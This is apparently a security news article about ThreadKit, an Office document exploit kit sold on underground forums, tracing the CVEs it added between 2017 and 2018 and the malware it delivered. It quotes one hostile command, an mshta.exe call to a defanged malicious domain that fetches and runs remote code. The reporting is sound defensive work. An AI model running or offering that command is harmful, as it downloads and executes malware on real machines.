Tuesday, March 4, 2025
HomeCVE/vulnerabilityHackers Distributing Variety of New Exploits and Malware via Microsoft Office Document...

Hackers Distributing Variety of New Exploits and Malware via Microsoft Office Document Exploit Kit

Published on

SIEM as a Service

Follow Us on Google News

Newly discovered Microsoft office document exploit kit contains a variety of recent exploits and Malware such as Lokibot, Formbook and tracking kit called such as ThreadKit targeting various organization and individuals around the world.

These Exploits kits are available in restricted underground crime forums and the cybercriminals are selling them at a different price.

They are used to spread a variety of malware payloads such as Trickbot and Chthonic, and RATs such as FormBook and Loki Bot and it also used for more sophisticated cyber attacks.

Also Read: Hackers Illegally Purchasing Abused Code-signing & SSL Certificates From Underground Market

Exploit Kit Activities in June 2017

Initially, ThreadKit starts its activities around mid of 2017 with many of powerful exploits such as EXE and DOC files inside of the VBS Script.

It contains an exploited CVE-2017-0199 and download and execute the payload from its command and control server and install the embedded Smoke Loader and Trick banking malware.

Downloaded Decoy document

Exploit Kit Activities in October 2017

During October 2017, ThreadKit Started advertising in the underground forum including with another Exploit CVE 2017-8759.

Later it communicates with C2 server to execute the embedded executable and additionally it integrating the new vulnerabilities.

Also, it using various technique to avoid detection and employee the advance method to avoid detection by modifying the registry key.

The registry value “z|#” contains the path to the parent malicious document

Exploit kit Activities November 2017

Since Nov 2017 ThreadKit starts its aggressive activities and employee with brand new Microsoft Office vulnerabilities.

It Advertised the inclusion of exploits targeting CVE 2017-11882 running un the following command: “mshta.exe hxxps://seliodrones[.]info/vmware/w&\x12\x0cC”

Exploit kit Activity in February/March 2018

Very recent activities of this Exploit kit in Feb/March contains a very new serious exploit such as Adobe Flash zero-day (CVE-2018-4878) and several new Microsoft Office vulnerabilities.

According to Proofpoint,  A new forum post in February 2018 announced that exploits for the recently disclosed CVE-2018-0802, as well as a July 2017 Office vulnerability (CVE-2017-8570), had been added to ThreadKit.

Main Distributing of the large spike of email campaigns with ThreadKit generated MS Office attachments that included these exploits.

“ThreadKit is a relatively new and popular document exploit builder kit that has been used in the wild since at least June 2017, by a variety of actors carrying out both targeted and broad-based crimeware campaigns. This new document exploit builder kit makes the use of the latest Microsoft Office exploits accessible to even low-skilled malicious actors. Proofpoint said.”

Balaji
Balaji
BALAJI is an Ex-Security Researcher (Threat Research Labs) at Comodo Cybersecurity. Editor-in-Chief & Co-Founder - Cyber Security News & GBHackers On Security.

Latest articles

CISA Warns of Active Exploitation of Microsoft Windows Win32k Vulnerability

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has added CVE-2018-8639, a decade-old Microsoft Windows...

Update Alert: Google Warns of Critical Android Vulnerabilities Under Exploit

Google’s March 2025 Android Security Bulletin has unveiled two critical vulnerabilities—CVE-2024-43093 and CVE-2024-50302—currently under...

BigAnt Server 0-Day Vulnerability Lets Attackers Run Malicious Code Remotely

A critical vulnerability in BigAntSoft's enterprise chat server software has exposed ~50 internet-facing systems...

Bubba AI, Inc. is Launching Comp AI to Help 100,000 Startups Get SOC 2 Compliant by 2032.

With the growing importance of security compliance for startups, more companies are seeking to...

Supply Chain Attack Prevention

Free Webinar - Supply Chain Attack Prevention

Recent attacks like Polyfill[.]io show how compromised third-party components become backdoors for hackers. PCI DSS 4.0’s Requirement 6.4.3 mandates stricter browser script controls, while Requirement 12.8 focuses on securing third-party providers.

Join Vivekanand Gopalan (VP of Products – Indusface) and Phani Deepak Akella (VP of Marketing – Indusface) as they break down these compliance requirements and share strategies to protect your applications from supply chain attacks.

Discussion points

Meeting PCI DSS 4.0 mandates.
Blocking malicious components and unauthorized JavaScript execution.
PIdentifying attack surfaces from third-party dependencies.
Preventing man-in-the-browser attacks with proactive monitoring.

More like this

CISA Warns of Active Exploitation of Microsoft Windows Win32k Vulnerability

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has added CVE-2018-8639, a decade-old Microsoft Windows...

Update Alert: Google Warns of Critical Android Vulnerabilities Under Exploit

Google’s March 2025 Android Security Bulletin has unveiled two critical vulnerabilities—CVE-2024-43093 and CVE-2024-50302—currently under...

BigAnt Server 0-Day Vulnerability Lets Attackers Run Malicious Code Remotely

A critical vulnerability in BigAntSoft's enterprise chat server software has exposed ~50 internet-facing systems...